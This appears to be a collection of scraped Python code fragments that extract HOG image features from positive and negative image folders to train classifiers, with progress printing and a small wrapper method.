        debug_print("Restarting interrupted training (remove tmpfile to start from scratch)")
except Exception:
    debug_print("Reading data (%d files)" % fcount)

    n = 0
    pc = 0
    for f in os.scandir(args.positive_dir):
        data.append((hog.hog(Image.open(f.path)), 1))
        n += 1
        if n >= fcount / 10:
            n = 0
            pc += 10
            debug_print("%d%% read" % pc)

    for f in os.scandir(args.negative_dir):
        data.append((hog.hog(Image.open(f.path)), -1))
        n += 1
        if n >= fcount / 10:
            n = 0
            pc += 10
            debug_print("%d%% read" % pc)

debug_print("Done reading data")
Example #31
    hog_v2 = []
    target = []
    clf = None
    # '''
    # Positive Training
    pos = 0
    for files in folder_pos[pos_file_num // classifiers * i:
                            (pos_file_num + pos_file_num * i) // classifiers]:
        pos += 1
        im = io.imread(files)
        im = color.rgb2gray(im)
        h, w = im.shape

        hog_v1 = hog.hog(im,
                         orientations=9,
                         pixels_per_cell=(6, 6),
                         cells_per_block=(3, 3),
                         visualise=False,
                         normalise=True)
        hog_v.append(hog_v1)
        target.append(1)
        if (pos % 100 == 0):
            print("Positive Training ", i + 1, ", Progress status - ",
                  pos * 100 / (pos_file_num / 3), "%")

    # Negative Training
    neg = 0

    for files in folder_neg[neg_file_num // classifiers * i:
                            (neg_file_num + neg_file_num * i) // classifiers]:
        neg += 1
        im = io.imread(files)
    def run(self, im):
        if self.padding:
            return hog.hogpad(hog.hog(im, self.binsize))
        else:
            return hog.hog(im, self.binsize)